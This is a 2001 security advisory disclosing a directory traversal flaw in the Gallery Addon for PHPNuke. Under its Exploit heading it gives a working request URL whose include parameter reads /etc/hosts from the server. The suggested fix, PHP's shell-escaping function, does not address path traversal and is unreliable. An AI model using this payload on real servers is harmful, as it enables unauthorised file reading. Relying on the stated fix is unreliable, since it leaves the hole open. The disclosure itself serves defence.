iSecureLabs Security Advisory - Cabezon Aurelien has discovered a reverse directory traversal vulnerability in the Gallery Addon for PHPNuke that allows users to view arbitrary files on the remote system that are owned or readable by the httpd daemon.
fb56723b90987185c743733ccbeb618508f8f8601f8af9aefd50e2cfd6a70c9d
Gallery Addon for PhpNuke remote file viewing vulnerability
Problem discovered: 18/10/2001 by Cabezon Aurélien |
aurelien.cabezon@iSecureLabs.com
[1] Description
Gallery is an intuitive web based photo gallery with authenticated users and
privileged albums.
Photo management includes automatic thumbnails, resizing, rotation, etc.
Gallery is available as a Nuke 5.0 module.
Gallery Addon is vulnerable to the ../.. bug that allow remote file reading
on the web server as whatever
user runs the web server.
[2] Exploit
https://www.somehost.com/modules.php?set_albumName=album01&id=aaw&op=modload&
name=gallery&file=index&inclu
de=../../../../../../etc/hosts
[3] Fix
Coder has been alerted.
An easy way to fix such a vulnerability is to use the PHP included "system
escapeshell" function.
[4] Informations bout Gallery Addon for PhpNuke
https://www.menalto.com/projects/gallery-nuke/
Author: bharat@menalto.com
---
Cabezon Aurélien
https://www.iSecureLabs.com
aurelien.cabezon@iSecureLabs.